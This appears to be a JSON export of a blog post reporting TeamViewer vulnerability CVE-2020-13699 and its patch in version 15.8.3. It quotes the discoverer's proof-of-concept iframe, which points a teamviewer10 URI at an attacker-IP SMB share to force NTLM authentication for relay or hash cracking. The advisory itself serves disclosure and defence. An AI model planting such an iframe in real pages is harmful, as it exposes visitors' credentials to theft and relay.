{"id":15293,"date":"2020-08-10T00:17:08","date_gmt":"2020-08-09T22:17:08","guid":{"rendered":"http:\/\/159.69.82.204\/win\/?p=15293"},"modified":"2020-11-24T17:22:58","modified_gmt":"2020-11-24T16:22:58","slug":"teamviewer-patch-closes-vulnerability-cve-2020-13699-on-pc","status":"publish","type":"post","link":"https:\/\/borncity.com\/win\/2020\/08\/10\/teamviewer-patch-closes-vulnerability-cve-2020-13699-on-pc\/","title":{"rendered":"TeamViewer: Patch closes vulnerability CVE-2020-13699 on PC"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" style=\"float: left; margin: 0px 10px 0px 0px; display: inline\" src=\"https:\/\/www.borncity.com\/blog\/wp-content\/uploads\/2015\/01\/Schutz.jpg\" width=\"40\" align=\"left\" height=\"47\">[<a href=\"https:\/\/www.borncity.com\/blog\/2020\/08\/10\/teamviewer-patch-verhindert-ungewollten-zugriff-auf-pc\/\" target=\"_blank\" rel=\"noopener noreferrer\">German<\/a>]There was a vulnerability in older versions of the TeamViewer remote access software. This allowed third parties to establish a connection to the respective PC unnoticed. The vulnerability has been fixed by a patch.<\/p>\n<p><!--more--><\/p>\n<h2>The vulnerability CVE-2020-13699<\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" alt=\"\" src=\"https:\/\/vg05.met.vgwort.de\/na\/0f7a44d7bd164c8fbf06610cf5764344\" width=\"1\" height=\"1\">Vulnerability <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-13699\">CVE-2020-13699<\/a> affected the TeamViewer Desktop for Windows up to version 15.8.2, which does not correctly quote its custom URI handlers. A malicious website could start TeamViewer with arbitrary parameters, such as:<\/p>\n<p><em>teamviewer10: &#8211;play URL<\/em><\/p>\n<p>This allowed an attacker to force a victim to send an NTLM authentication request and either forward the request or capture the hash for offline password cracking. The discoverer of the vulnerability describes it <a href=\"https:\/\/web.archive.org\/web\/20201002193825\/https:\/\/jeffs.sh\/CVEs\/CVE-2020-13699.txt\" target=\"_blank\" rel=\"noopener noreferrer\">here<\/a> as follows. <\/p>\n<blockquote>\n<p>An attacker could embed a malicious iframe in a website with a crafted URL:<\/p>\n<p>&lt;iframe src=\"teamviewer10: &#8211;play \\\\attacker-IP\\share\\fake.tvs\"&gt;<\/p>\n<p>that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking). <\/iframe><\/p>\n<\/blockquote>\n<p>This could be used in Watering Hole attacks to connect unnoticed, as you can <a href=\"https:\/\/www.helpnetsecurity.com\/2020\/08\/06\/cve-2020-13699\/\" target=\"_blank\" rel=\"noopener noreferrer\">read here<\/a>. Not even a password is required. However, so far there is no indication that the vulnerability is being exploited.&nbsp; <\/p>\n<h2>Update to TeamViewer version 15.8.3<\/h2>\n<p>With Bleeping Computer I <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/teamviewer-fixes-bug-that-lets-attackers-access-your-pc\/\" target=\"_blank\" rel=\"noopener noreferrer\">noticed here<\/a> that there was an update of TeamViewer to version 15.8.3 which closes the vulnerability. However, the vendor <a href=\"https:\/\/community.teamviewer.com\/t5\/Announcements\/Statement-on-CVE-2020-13699\/m-p\/99129\" target=\"_blank\" rel=\"noopener noreferrer\">announced<\/a> the update in this community post about 2 weeks ago.&nbsp; <\/p>\n<blockquote>\n<h4>\n<p>Statement on CVE 2020-13699  <\/p>\n<p>Today we are releasing some updates for TeamViewer 8 through 15, for the Windows platform.  <\/p>\n<p>We implemented some improvements in URI handling relating to CVE 2020-13699.<\/p>\n<\/h4>\n<\/blockquote>\n<p><font size=\"3\">The changes can be found in <a href=\"https:\/\/community.teamviewer.com\/t5\/Change-Logs\/bd-p\/Change_Logs_EN\" target=\"_blank\" rel=\"noopener noreferrer\">the changelog<\/a>. <\/font><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[German]There was a vulnerability in older versions of the TeamViewer remote access software. This allowed third parties to establish a connection to the respective PC unnoticed. The vulnerability has been fixed by a patch.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[580,1547,22],"tags":[1179],"class_list":["post-15293","post","type-post","status-publish","format-standard","hentry","category-security","category-software","category-update","tag-teamviewer"],"_links":{"self":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/posts\/15293","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/comments?post=15293"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/posts\/15293\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/media?parent=15293"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/categories?post=15293"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/tags?post=15293"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}